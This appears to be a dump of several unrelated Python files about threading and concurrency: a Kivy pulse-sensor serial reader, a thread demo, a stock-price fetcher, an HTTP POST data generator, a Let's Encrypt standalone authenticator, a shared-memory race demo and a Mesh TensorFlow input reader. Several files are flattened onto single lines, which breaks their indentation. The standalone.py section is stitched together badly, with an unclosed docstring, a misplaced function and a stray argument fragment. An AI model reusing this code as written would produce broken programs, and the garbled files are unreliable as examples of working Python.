if not self.serial_port.is_open: break received_msg = self.serial_port.read(self.serial_port.in_waiting) if received_msg: lines = self.get_lines(received_msg) for line in lines: if len(line) < 1: continue if line[0] == 'S': # pluse sensor sample result = re.findall(r'\d+', line[1:] ) if len(result) > 0: self.samples.put(int(result[0])) elif line[0] == 'B': result = re.findall(r'\d+', line[1:] ) if len(result) > 0: self.ids.BPM_data.text = "BPM=" + result[0] elif line[0] == 'Q': result = re.findall(r'\d+', line[1:] ) if len(result) > 0: self.ids.IBI_data.text = "IBI=" + result[0] elif line[0] == 'T': # We add a temperature example here. If you have a temperature sensor, you can try to report temperature value with a prefix 'T' in your Arduino board. 
result = re.findall(r"[-+]?\d*\.\d+|\d+", line[1:]) if len(result) > 0: self.ids.Temperature_data.text = "Temperature=" + result[0] else: time.sleep(0.01) except Exception as ex: raise ex usb_serial_params_json = ''' [ { "type": "options", "title": "Baud rate", "section": "communication", "key": "baud_rate", "options": ["921600","460800","230400", "115200","57600","38400","19200","9600"] }, { "type": "options", "title": "Data bits", "section": "communication", "key": "data_bits", "options": ["8","7","6","5"] }, { "type": "options", "title": "Parity", "section": "communication", "key": "parity", "options": ["N","E","O"] }, { "type": "options", "title": "Stop bits", "section": "communication", "key": "stop_bits", "options": ["1","1.5","2"] } ] ''' class PulseSensorViewerDemoApp(App): def build(self): return PulseSensorViewerDemo() def build_config(self, config): """ Set the default values for the configs sections. """ config.setdefaults('communication', {'baud_rate' : 115200, 'data_bits' : 8, 'parity': 'N', 'stop_bits' : 1 }) def build_settings(self, settings): """ Add our custom section to the default configuration object. """ settings.add_json_panel('USB serial parameters', self.config, data=usb_serial_params_json) def on_pause(self): return True def on_stop(self): self.root.reading_thread_enabled = False if __name__ == '__main__': PulseSensorViewerDemoApp().run()
thread_name_and_process.py
# Consider the python program given below, in which we print the thread
# name and the corresponding process for each task.
# BUG FIX: this sentence was a bare prose line in the original file,
# which made the whole module a SyntaxError; it is now a comment.

# Python program to illustrate the concept of threading.
import threading
import os


def task1():
    """Report which thread and which process run task 1."""
    print("Task 1 assigned to thread: {}".format(threading.current_thread().name))
    print("ID of process running task 1: {}".format(os.getpid()))


def task2():
    """Report which thread and which process run task 2."""
    print("Task 2 assigned to thread: {}".format(threading.current_thread().name))
    print("ID of process running task 2: {}".format(os.getpid()))


if __name__ == "__main__":
    # print ID of current process
    print("ID of process running main program: {}".format(os.getpid()))

    # print name of main thread
    print("Main thread name: {}".format(threading.main_thread().name))

    # creating threads
    t1 = threading.Thread(target=task1, name='t1')
    t2 = threading.Thread(target=task2, name='t2')

    # starting threads
    t1.start()
    t2.start()

    # wait until all threads finish
    t1.join()
    t2.join()
stockprice.py
#!/usr/bin/env python # -*- coding: utf-8 -*- """stockprice.py - get stock price from News sources and add to Elasticsearch. See README.md or https://github.com/shirosaidev/stocksight for more information. Copyright (C) Chris Park 2018-2019 Copyright (C) Allen (Jian Feng) Xie 2019 stocksight is released under the Apache 2.0 license. See LICENSE for the full license text. """ import sys import threading import time from random import randint from StockSight.Initializer.ElasticSearch import es from StockSight.Initializer.Logger import * from StockSight.EsMap.StockPrice import mapping from StockSight.StockPriceListener import StockPriceListener from base import Symbol, SymbolAlias, TwitterUser STOCKSIGHT_VERSION = '0.2' __version__ = STOCKSIGHT_VERSION if __name__ == '__main__': try: for symbol in Symbol.objects.values_list('name', flat=True): try: logger.info('Creating new Price index or using existing ' + symbol) es.indices.create(index=config.elasticsearch['table_prefix']['price']+symbol.lower(), body=mapping, ignore=[400, 404]) stockprice = StockPriceListener() price_thread = threading.Thread(target=stockprice.get_price,args=(symbol,)) price_thread.start() if(config.spawn_intervals['stockprice_min'] > 0): time.sleep(randint(config.spawn_intervals['stockprice_min'], config.spawn_intervals['stockprice_max'])) except Exception as e: logger.warning("%s" % e) pass # get stock price except Exception as e: logger.warning("Exception: Failed to get stock data caused by: %s" % e) except KeyboardInterrupt: print("Ctrl-c keyboard interrupt, exiting...") sys.exit(0)
http_generator.py
""" Tensor generator that yields images and labels for the image. Accepts HTTP POSTs which will enqueue data to the process queue. """ import threading import time try: # Python 3 from http.server import BaseHTTPRequestHandler, HTTPServer from socketserver import ThreadingMixIn except: # Python 2 from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer from SocketServer import ThreadingMixIn class ThreadingHTTPServer(ThreadingMixIn, HTTPServer): """ Custom HTTP server derives from ThreadingMixIn and HTTPServer. """ pass def MakePostHandler(postDataCb, queue): """ Wrapper function to compose a HTTP Handler for the POSTs. The `postDataCb` will be invoked with the POST data, this will allow the app to enqueue data to it's queue. If the `postDataCb` is not specified, then the POST data is blindly enqueued to the application queue. """ class CustomHandler(BaseHTTPRequestHandler): """ Custom HTTP handler to intercept and enqueue POST events. """ def do_POST(self): """ POST handler. """ length = int(self.headers['Content-Length']) data = self.rfile.read(length) if postDataCb: postDataCb(data) else: queue.put(data) # Respond with a 200 - OK. self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write("OK") return CustomHandler class TfHttpGenerator(): """ Generator class to wrap the server and generator for TF. """ queue = None # Opaque queue from app (fetch only) postFn = None # Post fn to invoke port = None # Server PORT # httpd = None # HTTP server instance def __init__(self, q, pfn=None, port=8080): """ Custom HTTP generator. Requires an argument which specifies the handler function to invoke which parses the JSON data and enqueues into the queue. """ self.queue = q self.postFn = pfn self.port = port def generator(self): """ generator function for the dataset. This will yield a tuple of image data and label on calls to the dataset iterator's get_next() method. 
""" # TODO (sabhiram) : Figure out correct time to sleep, do we need a warning? while True: if self.queue.empty(): # print("Generator empty - waiting for more POST data") time.sleep(1) while not self.queue.empty(): yield self.queue.get() def run(self): """ Run the threaded server endlessly. """ server_addr = ("", self.port) posth = MakePostHandler(self.postFn, self.queue) self.httpd = ThreadingHTTPServer(server_addr, posth) print("Server starting...") self.httpd.serve_forever() def shutdown(self): """ Shutdown the HTTP server. """ self.httpd.socket.close() self.httpd.shutdown() def run_threaded(self): """ Execute the HTTP server's handler in its own thread. """ t = threading.Thread(target=self.run) t.daemon = True t.start()
standalone.py
"""Standalone Authenticator.""" import argparse import collections import logging import socket import threading import OpenSSL import six import zope.interface from acme import challenges from acme import standalone as acme_standalone from letsencrypt import errors from letsencrypt import interfaces from letsencrypt.plugins import common from letsencrypt.plugins import util logger = logging.getLogger(__name__) class ServerManager(object): """Standalone servers manager. Manager for `ACMEServer` and `ACMETLSServer` instances. `certs` and `http_01_resources` correspond to `acme.crypto_util.SSLSocket.certs` and `acme.crypto_util.SSLSocket.http_01_resources` respectively. All created servers share the same certificates and resources, so if you're running both TLS and non-TLS instances, HTTP01 handlers will serve the same URLs! """ _Instance = collections.namedtuple("_Instance", "server thread") def __init__(self, certs, http_01_resources): self._instances = {} self.certs = certs self.http_01_resources = http_01_resources def run(self, port, challenge_type): """Run ACME server on specified ``port``. This method is idempotent, i.e. all calls with the same pair of ``(port, challenge_type)`` will reuse the same server. :param int port: Port to run the server on. :param challenge_type: Subclass of `acme.challenges.Challenge`, either `acme.challenge.HTTP01` or `acme.challenges.TLSSNI01`. :returns: Server instance. 
def supported_challenges_validator(data):
    """Supported challenges validator for the `argparse`.

    It should be passed as `type` argument to `add_argument`.
    """
    requested = data.split(",")
    # Anything that is not a known ACME challenge type is an error.
    bad = [typ for typ in requested if typ not in challenges.Challenge.TYPES]
    if bad:
        raise argparse.ArgumentTypeError(
            "Unrecognized challenges: {0}".format(", ".join(bad)))
    # A valid challenge type may still be one this plugin cannot serve.
    supported = set(chall.typ for chall in SUPPORTED_CHALLENGES)
    if not set(requested).issubset(supported):
        raise argparse.ArgumentTypeError(
            "Plugin does not support the following (valid) "
            "challenges: {0}".format(", ".join(set(requested) - supported)))
    return data
Preferred in the order they are listed.", type=supported_challenges_validator, default=",".join(chall.typ for chall in SUPPORTED_CHALLENGES)) @property def supported_challenges(self): """Challenges supported by this plugin.""" return [challenges.Challenge.TYPES[name] for name in self.conf("supported-challenges").split(",")] @property def _necessary_ports(self): necessary_ports = set() if challenges.HTTP01 in self.supported_challenges: necessary_ports.add(self.config.http01_port) if challenges.TLSSNI01 in self.supported_challenges: necessary_ports.add(self.config.tls_sni_01_port) return necessary_ports def more_info(self): # pylint: disable=missing-docstring return("This authenticator creates its own ephemeral TCP listener " "on the necessary port in order to respond to incoming " "tls-sni-01 and http-01 challenges from the certificate " "authority. Therefore, it does not rely on any existing " "server program.") def prepare(self): # pylint: disable=missing-docstring pass def get_chall_pref(self, domain): # pylint: disable=unused-argument,missing-docstring return self.supported_challenges def perform(self, achalls): # pylint: disable=missing-docstring if any(util.already_listening(port) for port in self._necessary_ports): raise errors.MisconfigurationError( "At least one of the (possibly) required ports is " "already taken.") try: return self.perform2(achalls) except errors.StandaloneBindError as error: display = zope.component.getUtility(interfaces.IDisplay) if error.socket_error.errno == socket.errno.EACCES: display.notification( "Could not bind TCP port {0} because you don't have " "the appropriate permissions (for example, you " "aren't running this program as " "root).".format(error.port)) elif error.socket_error.errno == socket.errno.EADDRINUSE: display.notification( "Could not bind TCP port {0} because it is already in " "use by another process on this system (such as a web " "server). 
Please stop the program in question and then " "try again.".format(error.port)) else: raise # XXX: How to handle unknown errors in binding? def perform2(self, achalls): """Perform achallenges without IDisplay interaction.""" responses = [] for achall in achalls: if isinstance(achall.chall, challenges.HTTP01): server = self.servers.run( self.config.http01_port, challenges.HTTP01) response, validation = achall.response_and_validation() self.http_01_resources.add( acme_standalone.HTTP01RequestHandler.HTTP01Resource( chall=achall.chall, response=response, validation=validation)) else: # tls-sni-01 server = self.servers.run( self.config.tls_sni_01_port, challenges.TLSSNI01) response, (cert, _) = achall.response_and_validation( cert_key=self.key) self.certs[response.z_domain] = (self.key, cert) self.served[server].add(achall) responses.append(response) return responses def cleanup(self, achalls): # pylint: disable=missing-docstring # reduce self.served and close servers if none challenges are served for server, server_achalls in self.served.items(): for achall in achalls: if achall in server_achalls: server_achalls.remove(achall) for port, server in six.iteritems(self.servers.running()): if not self.served[server]: self.servers.stop(port)
25_multiprocess_sharememory_unsafe.py
""" 进程间通信之共享内存 """ from multiprocessing import Process from multiprocessing import Value num = Value('i', 0) def do_sth(): global num for i in range(1000000): """ 相当于:num.value = num.value + 1 首先计算 num.value + 1 存入临时变量中 然后将临时变量的赋值给Num """ num.value += 1 t1 = Process(target=do_sth) t2 = Process(target=do_sth) t1.start() t2.start() t1.join() t2.join() print(num.value)
input_reader.py
# coding=utf-8
# Copyright 2020 The Mesh TensorFlow Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""Input pipeline for MeshTensorflow.

If you run MeshTensorflow models on TPUs, please use SimdMeshImplInputReader
as your input pipeline. Otherwise, please use PlacementMeshImplInputReader.

For SimdMeshImplInputReader, a user provides the following, and this set of
APIs will handle the input pipeline for MeshTensorflow.
  1. An instance of mtf.simd_mesh_impl.SimdMeshImpl.
  2. A function that creates a tf.data.Dataset.
     The Dataset returns single examples (no batch dimension).
  3. Shape (mtf.Shape) of each tensor given by tf.data.Dataset.
     Each of these shapes must begin with the same batch dimension.

Example of usage:
  simd_mesh_impl = mtf.simd_mesh_impl.SimdMeshImpl(...)
  simd_input_reader = SimdMeshImplInputReader(simd_mesh_impl,
                                              ds_creator,
                                              mtf_input_shapes)

  infeed_queue = simd_input_reader.infeed_queue
  tpu_train_computation = tpu.replicate(
      computation=model_fn,
      inputs=[[]] * num_cores,
      infeed_queue=infeed_queue, ...)

  # In model_fn, import the input tensors using mtf.import_laid_out_tensor.
  def model_fn(features, labels):
    ...
    laidout_features = mtf.simd_mesh_impl.SimdMeshImpl.LaidOutTensor([features])
    x = mtf.import_laid_out_tensor(mesh, laidout_features, mtf_io_shape)
    h = mtf.layers.dense(h, ...)
    ...

  # Start the infeed enqueue thread after you created a session:
  with tf.Session(...) as sess:
    simd_input_reader.start_infeed_thread(sess,
                                          number_steps=num_training_steps)
    for _ in range(num_training_steps):
      sess.run(tpu_train_computation)

Also check out SimdMeshImplInputReader.gen_infeed_queue().
"""

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import collections
import threading
import time
import numpy as np
import tensorflow.compat.v1 as tf

# pylint: disable=g-direct-tensorflow-import
from tensorflow.python.framework import ops
from tensorflow.python.tpu import tpu_feed

# Sentinel for "no pnum assigned yet" slots in a pnum_map.
_NONE_PNUM = None
# Sentinel for "no tensor placed yet" slots in all_laidout_tensors.
_NO_DATA = None


def _host_device_to_id(device_str):
  """Extracts the integer task id from a TF device string like
  "/job:worker/task:3/device:CPU:0"."""
  assert isinstance(device_str, str)
  id_string = device_str.lower().split("/task:")[1].split("/device:")[0]
  id_int = int(id_string)
  # Guards against non-canonical task strings (e.g. leading zeros).
  assert str(id_int) == id_string
  return id_int


def _host_id_to_tf_device(host_id, external_worker):
  """Builds the CPU device string for a host id; includes the tpu_worker job
  name only when an external worker is used (e.g. not in local unit tests)."""
  assert isinstance(host_id, int)
  if external_worker:
    return "/job:tpu_worker/task:{}/device:CPU:0".format(host_id)
  else:
    return "/task:{}/device:CPU:0".format(host_id)


class SubBatchSlicer(object):
  """Reads and distributes a sub-batch on a host.

  Owns one dataset iterator pinned to a single host, and slices each tensor it
  produces into per-core pieces according to the SIMD mesh layout.
  """

  def __init__(self, sub_batch_ds_creator, host_id, all_sub_batch_pnums,
               simd_mesh_impl, mtf_input_shapes, external_worker,
               global_batch):
    # all_sub_batch_pnums: one list of destination pnums per input tensor.
    # global_batch: True when this host reads the full (global) batch rather
    # than a per-host sub-batch; controls how the batch dim is sliced.
    self._host_id = host_id
    self._all_sub_batch_pnums = all_sub_batch_pnums
    self._simd_mesh_impl = simd_mesh_impl
    self._mtf_input_shapes = mtf_input_shapes
    self._external_worker = external_worker
    self._global_batch = global_batch

    self._validate_args()

    # The iterator must live on the host that feeds these cores.
    with ops.device(_host_id_to_tf_device(self._host_id,
                                          self._external_worker)):
      self._ds_iterator = sub_batch_ds_creator().make_initializable_iterator()

  @property
  def initializer(self):
    # Initializer op for the underlying dataset iterator.
    return self._ds_iterator.initializer

  def get_slices(self):
    """Yields sliced tensors and which remote pnums they should go to.

    Yields:
      tf_tensor: The sliced tensor.
      pnum: Which process number the tf_tensor should go to.
      input_i: The input ordinal of the tf_tensor.
    """
    with ops.device(_host_id_to_tf_device(self._host_id,
                                          self._external_worker)):
      all_input_tensors = self._ds_iterator.get_next()
      # A single-tensor dataset yields a bare Tensor; normalize to a list.
      if isinstance(all_input_tensors, tf.Tensor):
        all_input_tensors = [all_input_tensors]
      assert len(all_input_tensors) == len(self._all_sub_batch_pnums)

      for input_i in range(len(all_input_tensors)):
        input_tensor = all_input_tensors[input_i]
        sub_batch_pnums = self._all_sub_batch_pnums[input_i]
        mtf_input_shape = self._mtf_input_shapes[input_i]

        # Initialize the cache for each input_i; slices are only shared
        # between pnums of the same input tensor.
        self._init_slice_cache()

        for pnum in sub_batch_pnums:
          # TODO(lehou): tf.slice is kinda slow. Use tf.split instead.
          input_slice = self._slice_tensor(input_tensor, mtf_input_shape, pnum)
          yield input_slice, pnum, input_i

  def _validate_args(self):
    assert isinstance(self._all_sub_batch_pnums, list)
    assert isinstance(self._mtf_input_shapes, list)
    assert self._all_sub_batch_pnums
    assert self._mtf_input_shapes
    assert len(self._all_sub_batch_pnums) == len(self._mtf_input_shapes)

  def _init_slice_cache(self):
    # Cache for tensor slices, keyed by slice-begin coordinates, so pnums
    # that map to the same slice reuse one tf.slice op.
    self._slice_dict = collections.defaultdict(list)

  def _slice_tensor(self, input_tensor, mtf_input_shape, pnum):
    """Slice input_tensor according to mtf_input_shape and pnum."""
    s_begin = self._simd_mesh_impl.slice_begin(mtf_input_shape, pnum)
    if not self._global_batch:
      # Always slice from 0 in the first dimension (batch dimension), since
      # input_tensor is a sub-batch tensor: its batch dim starts at 0 on this
      # host, regardless of the global slice_begin.
      s_begin[0] = 0
    if tuple(s_begin) in self._slice_dict:
      return self._slice_dict[tuple(s_begin)]
    s_shape = self._simd_mesh_impl.slice_shape(mtf_input_shape)
    input_slice = tf.slice(input_tensor, s_begin, s_shape)
    self._slice_dict[tuple(s_begin)] = input_slice
    return input_slice


class ProcessDevices(object):
  """A utility class that maps between pnum and devices.

  Precomputes, in logical pnum order, each replica's TPU ordinal, TPU device,
  host device and host id, plus the reverse host_id -> pnums mapping.
  """

  def __init__(self, simd_mesh_impl):
    """Init tpu and host devices in logical order."""
    self._num_cores = simd_mesh_impl.device_assignment.num_replicas
    self._ordered_ordinals = []
    self._ordered_tpus = []
    self._ordered_hosts = []
    self._ordered_host_ids = []
    self._host_id_to_its_pnums = collections.defaultdict(list)
    d_assignment = simd_mesh_impl.device_assignment

    for pnum in range(self.num_cores):
      # l2p: logical pnum -> physical pnum.
      physical_pnum = simd_mesh_impl.l2p(pnum)

      # For MTF, there's always 1 core per replica. So logical_core=0.
      self._ordered_ordinals.append(
          d_assignment.tpu_ordinal(replica=physical_pnum, logical_core=0))
      tpu_device = d_assignment.tpu_device(replica=physical_pnum)
      host_device = d_assignment.host_device(replica=physical_pnum)
      host_id = _host_device_to_id(host_device)
      self._ordered_tpus.append(tpu_device)
      self._ordered_hosts.append(host_device)
      self._ordered_host_ids.append(host_id)
      self._host_id_to_its_pnums[host_id].append(pnum)

    self._num_hosts = len(set(self._ordered_hosts))
    self._num_cores_per_host = self.num_cores // self._num_hosts
    # Assumes every host serves the same number of cores.
    assert self.num_cores == self._num_hosts * self._num_cores_per_host

    tf.logging.info("Process Devices "
                    "ordered_ordinals: {}, "
                    "ordered_tpus: {}, "
                    "ordered_hosts: {}, "
                    "host_id_to_its_pnums: {}.".format(
                        self.ordered_ordinals,
                        self.ordered_tpus,
                        self.ordered_hosts,
                        self.host_id_to_its_pnums))

  @property
  def ordered_ordinals(self):
    return self._ordered_ordinals

  @property
  def ordered_tpus(self):
    return self._ordered_tpus

  @property
  def ordered_hosts(self):
    return self._ordered_hosts

  @property
  def ordered_host_ids(self):
    return self._ordered_host_ids

  @property
  def host_id_to_its_pnums(self):
    return self._host_id_to_its_pnums

  @property
  def num_cores(self):
    return self._num_cores

  @property
  def num_hosts(self):
    return self._num_hosts

  @property
  def num_cores_per_host(self):
    return self._num_cores_per_host


class SimdMeshImplInputReader(object):
  """Handles input pipeline for SimdMeshImpl."""

  def __init__(self,
               simd_mesh_impl,
               ds_creator,
               mtf_input_shapes,
               ds_prefetch_size=tf.data.experimental.AUTOTUNE,
               external_worker=True,
               is_eval_mode=False):
    """Input pipeline for the SIMD implementation of MeshTensorflow.

    Args:
      simd_mesh_impl: A mtf.simd_mesh_impl.SimdMeshImpl object.
      ds_creator: A function that creates a dataset.
      mtf_input_shapes: A list of mtf.Shape. The length of it must be equal
        to the number of elements generated by the ds_creator. NOTE, we
        assume:
          1. The 0-th dimension is the batch dimension.
          2. The batch dimension is consistent across all input shapes in
             mtf_input_shapes.
      ds_prefetch_size: The buffer size for prefetching
        (default tf.data.experimental.AUTOTUNE).
      external_worker: Whether you have an external tpu_worker or not. Set it
        to False if you run the program locally, for example, during local
        unit test.
      is_eval_mode: In evaluation mode, only one dataset object will be
        created, as opposed to one dataset for each sub-batch. Default is
        False. Set it to True during evaluation, to ensure that one
        evaluation instance will be used once and only once.

    Note:
      1. The efficiency is optimized according to the shape of the 0-th
         tensor: mtf_input_shapes[0]. We recommend you to put the largest
         tensor as the 0-th input.
      2. You need to call start_infeed_thread() before your train ops.

    Example:
      simd_mesh_impl = mtf.simd_mesh_impl.SimdMeshImpl(...)

      # ds_creator is function that creates a tf.data.Dataset.
      # This Dataset must return single examples (no batch dimension).
      def ds_creator():
        return tf.data.Dataset.from_tensors(x)

      # mtf_input_shapes is a list of Shapes of all input tensors given by the
      # dataset. All shapes must begin with the same batch dimension.
      simd_input_reader = SimdMeshImplInputReader(simd_mesh_impl,
                                                  ds_creator,
                                                  mtf_input_shapes)

      batch_dim = mtf.Dimension('batch', FLAGS.batch_size)
      io_dim = mtf.Dimension('io', FLAGS.io_size)
      mtf_input_shapes = [mtf.Shape([batch_dim, io_dim])]

      infeed_queue = simd_input_reader.infeed_queue
      tpu_train_computation = tpu.replicate(
          computation=model_fn,
          inputs=[[]] * num_cores,
          infeed_queue=infeed_queue, ...)

      with tf.Session() as sess:
        simd_input_reader.start_infeed_thread(sess,
                                              number_steps=num_training_steps)
        for _ in range(num_training_steps):
          sess.run(tpu_train_computation)
    """
    super(SimdMeshImplInputReader, self).__init__()
    assert mtf_input_shapes
    assert isinstance(mtf_input_shapes, list)

    # TODO(lehou): Support nested structures for ds_creator, mtf_input_shapes.
    self._simd_mesh_impl = simd_mesh_impl
    self._p_dev = ProcessDevices(simd_mesh_impl)
    self._ds_creator = ds_creator
    self._mtf_input_shapes = mtf_input_shapes
    self._ds_prefetch_size = ds_prefetch_size
    self._external_worker = external_worker
    self._is_eval_mode = is_eval_mode

    # Builds _infeed_queue, _enqueue_ops and _input_initializers eagerly.
    self._gen_infeed_queue()

  @property
  def infeed_queue(self):
    return self._infeed_queue

  def start_infeed_thread(self, sess, number_steps=-1, initial_wait_sec=0.5):
    """Start running enqueue ops in a thread.

    Args:
      sess: A tf.Session.
      number_steps: Number of times to call sess.run(enqueue_ops).
        default is -1 (forever).
      initial_wait_sec: Number of seconds to wait before starting the enqueue
        loop. Default is 0.5.
    """
    def _thread_fn():
      time.sleep(initial_wait_sec)
      if number_steps > 0:
        for _ in range(number_steps):
          sess.run(self._enqueue_ops)
      else:
        # number_steps <= 0 means enqueue forever.
        while True:
          sess.run(self._enqueue_ops)

    # Initialize dataset iterators before the enqueue loop starts.
    sess.run(self._input_initializers)
    self._infeed_thread = threading.Thread(target=_thread_fn)
    self._infeed_thread.start()

  def _gen_infeed_queue(self):
    """Generates _infeed_queue, _enqueue_ops, _input_initializers."""
    pnum_maps = []
    batch_size = self._mtf_input_shapes[0].to_integer_list[0]
    for mtf_shape in self._mtf_input_shapes:
      # Make sure that the batch size is the same across all input tensors.
      assert batch_size == mtf_shape.to_integer_list[0]
      pnum_maps.append(self._get_pnum_map(mtf_shape))

    # For each sub-batch, we need to know which host should read it.
    if self._is_eval_mode:
      # There should be just one dataset-holding host. Make the last host do
      # it.
      hosts_to_hold_ds = [self._p_dev.num_hosts - 1]
    else:
      # Host assignment is driven by the 0-th input's pnum map.
      hosts_to_hold_ds = self._get_hosts_to_hold_ds(pnum_maps[0])
    sub_batch_size = batch_size // len(hosts_to_hold_ds)
    tf.logging.info("MTF sub_batch_size: {}".format(sub_batch_size))
    # The global batch must divide evenly among the dataset-holding hosts.
    assert sub_batch_size * len(hosts_to_hold_ds) == batch_size

    def sub_batch_ds_creator():
      return self._ds_creator().batch(
          sub_batch_size, drop_remainder=True).prefetch(
              self._ds_prefetch_size)

    sub_batch_slicer_list = []
    # For each sub-batch, create a SubBatchSlicer object.
    for sub_batch_i, host_id in enumerate(hosts_to_hold_ds):
      # Get the list of pnums for each input.
      if self._is_eval_mode:
        # In eval mode the single host feeds every core.
        all_sub_batch_pnums = [
            pnum_map.flatten().tolist() for pnum_map in pnum_maps]

        sub_batch_slicer_list.append(SubBatchSlicer(sub_batch_ds_creator,
                                                    host_id,
                                                    all_sub_batch_pnums,
                                                    self._simd_mesh_impl,
                                                    self._mtf_input_shapes,
                                                    self._external_worker,
                                                    global_batch=True))
      else:
        all_sub_batch_pnums = []
        for pnum_map in pnum_maps:
          sub_batch_pnums = pnum_map[sub_batch_i, ...].flatten().tolist()
          all_sub_batch_pnums.append(sub_batch_pnums)

        sub_batch_slicer_list.append(SubBatchSlicer(sub_batch_ds_creator,
                                                    host_id,
                                                    all_sub_batch_pnums,
                                                    self._simd_mesh_impl,
                                                    self._mtf_input_shapes,
                                                    self._external_worker,
                                                    global_batch=False))

    # Slots for all laidout tensors: all_laidout_tensors[pnum][input_i].
    all_laidout_tensors = [[_NO_DATA] * len(self._mtf_input_shapes) \
        for _ in range(self._p_dev.num_cores)]

    # Read tf_tensors, put them in slots.
    for sub_batch_slicer in sub_batch_slicer_list:
      for tf_tensor, pnum, input_i in sub_batch_slicer.get_slices():
        all_laidout_tensors[pnum][input_i] = tf_tensor

    # Make sure that there are no Nones in all_laidout_tensors.
    for laidout_tensors in all_laidout_tensors:
      assert _NO_DATA not in laidout_tensors

    # Build the enqueue ops on the first dataset-holding host.
    with ops.device(_host_id_to_tf_device(hosts_to_hold_ds[0],
                                          self._external_worker)):
      self._infeed_queue, self._enqueue_ops = self._enqueue_laidout_tensors(
          all_laidout_tensors)

    self._input_initializers = [s.initializer for s in sub_batch_slicer_list]

  def _get_pnum_map(self, mtf_shape):
    """Returns the pnum_map according to mtf_shape.

    Args:
      mtf_shape: A mtf.Shape object.

    Returns:
      A numpy array pnum_map. For the i-th sub-batch, pnum_map[i] is a numpy
      array containing all pnums that tensor slices of the i-th sub-batch
      will be sent to.
    """
    s_shape = self._simd_mesh_impl.slice_shape(mtf_shape)
    # Number of slices along each dimension.
    shape_list = [dim_size // s_dim_size for dim_size, s_dim_size in zip(
        mtf_shape.to_integer_list, s_shape)]

    # Trailing axis collects the pnums that share the same slice coordinate
    # (replicated slices).
    pnum_map_shape = shape_list + [
        self._p_dev.num_cores // np.prod(shape_list)]
    assert np.prod(pnum_map_shape) == self._p_dev.num_cores

    # Initialize the pnum_map to _NONE_PNUM.
    pnum_map = np.empty(pnum_map_shape, dtype=object)
    pnum_map[:] = _NONE_PNUM

    for pnum in range(self._p_dev.num_cores):
      s_begin = self._simd_mesh_impl.slice_begin(mtf_shape, pnum)
      # Slice-begin offsets -> slice-grid coordinates.
      coord = [dim_size // s_dim_size for dim_size, s_dim_size in zip(
          s_begin, s_shape)]

      # put pnum in pnum_map[coord]: fill the first free replication slot.
      pnum_array_ref = pnum_map[tuple(coord)]
      for idx, value in enumerate(pnum_array_ref):
        if value is _NONE_PNUM:
          pnum_array_ref[idx] = pnum
          break

    tf.logging.info("MTF pnum_map: {}".format(pnum_map))
    assert _NONE_PNUM not in pnum_map
    return pnum_map

  def _get_hosts_to_hold_ds(self, pnum_map):
    """Finds which host should read which sub-batch."""
    assert _NONE_PNUM not in pnum_map

    # This records how many datasets (ds) are already stored on each host.
    num_dss_per_host = [0] * self._p_dev.num_hosts

    # A list of host_ids that holds datasets (ds).
    hosts_to_hold_ds = []

    def _get_num_pnums_per_host(sub_batch_pnum_map):
      # Count how many of this sub-batch's destination cores live on each
      # host, so the sub-batch can be read close to its consumers.
      num_pnums_per_host = [0] * self._p_dev.num_hosts
      for pnum in sub_batch_pnum_map.flatten():
        num_pnums_per_host[self._p_dev.ordered_host_ids[pnum]] += 1
      return num_pnums_per_host

    def _find_host_id_with_most_pnums_and_least_ds(num_pnums_per_host,
                                                   num_dss_per_host):
      host_metics = [(
          host_id, num_pnums_per_host[host_id], num_dss_per_host[host_id]) \
          for host_id in range(self._p_dev.num_hosts)]
      # Major max key: num_pnums
      # Minor max key: -num_dss. We need to find a relatively spare host.
      host_id, _, _ = max(host_metics, key=lambda keys: (keys[1], -keys[2]))
      return host_id

    for sub_batch_pnum_map in pnum_map:
      num_pnums_per_host = _get_num_pnums_per_host(sub_batch_pnum_map)
      host_id = _find_host_id_with_most_pnums_and_least_ds(num_pnums_per_host,
                                                           num_dss_per_host)
      num_dss_per_host[host_id] += 1
      hosts_to_hold_ds.append(host_id)

    return hosts_to_hold_ds

  def _enqueue_laidout_tensors(self, all_laidout_tensors):
    """Generate enqueue ops to enqueue all_laidout_tensors."""

    def _tpu_ordinal_function_impl(pnum):
      return self._p_dev.ordered_ordinals[pnum]

    def _placement_function_impl(pnum):
      return self._p_dev.ordered_hosts[pnum]

    # Queue tuple structure is taken from the pnum-0 tensors; all pnums are
    # assumed to carry the same dtypes/shapes.
    laidout_tensors0 = all_laidout_tensors[0]
    infeed_queue = tpu_feed.InfeedQueue(
        number_of_tuple_elements=len(laidout_tensors0),
        tuple_types=[x.dtype for x in laidout_tensors0],
        tuple_shapes=[x.shape for x in laidout_tensors0])
    enqueue_ops = infeed_queue.generate_enqueue_ops(
        all_laidout_tensors,
        tpu_ordinal_function=_tpu_ordinal_function_impl,
        placement_function=_placement_function_impl)
    return infeed_queue, enqueue_ops


class PlacementMeshImplInputReader(object):
  """Handles input pipeline for PlacementMeshImpl."""

  def __init__(self,
               placement_mesh_impl,
               ds_creator,
               mtf_input_shapes,
               ds_prefetch_size=tf.data.experimental.AUTOTUNE,
               is_eval_mode=False):
    # See SimdMeshImplInputReader for the meaning of ds_creator,
    # mtf_input_shapes, ds_prefetch_size and is_eval_mode.
    self._placement_mesh_impl = placement_mesh_impl
    self._mtf_input_shapes = mtf_input_shapes

    batch_size = mtf_input_shapes[0].dims[0].size
    if is_eval_mode:
      # Keep the final partial batch during evaluation.
      ds = ds_creator().batch(
          batch_size, drop_remainder=False).prefetch(ds_prefetch_size)
    else:
      ds = ds_creator().batch(
          batch_size, drop_remainder=True).prefetch(ds_prefetch_size)
    self._ds_iterator = ds.make_initializable_iterator()
    self._input_initializers = [self._ds_iterator.initializer]

  def initialize(self, sess):
    # Run the dataset iterator initializers in the given session.
    sess.run(self._input_initializers)

  def gpu_placement(self, model_fn):
    # Assumes the dataset yields exactly (image, label) pairs matching
    # mtf_input_shapes[0] and mtf_input_shapes[1] respectively.
    image, label = self._ds_iterator.get_next()
    image_laid_out = self._placement_mesh_impl.make_slices(
        image, self._mtf_input_shapes[0])
    label_laid_out = self._placement_mesh_impl.make_slices(
        label, self._mtf_input_shapes[1])
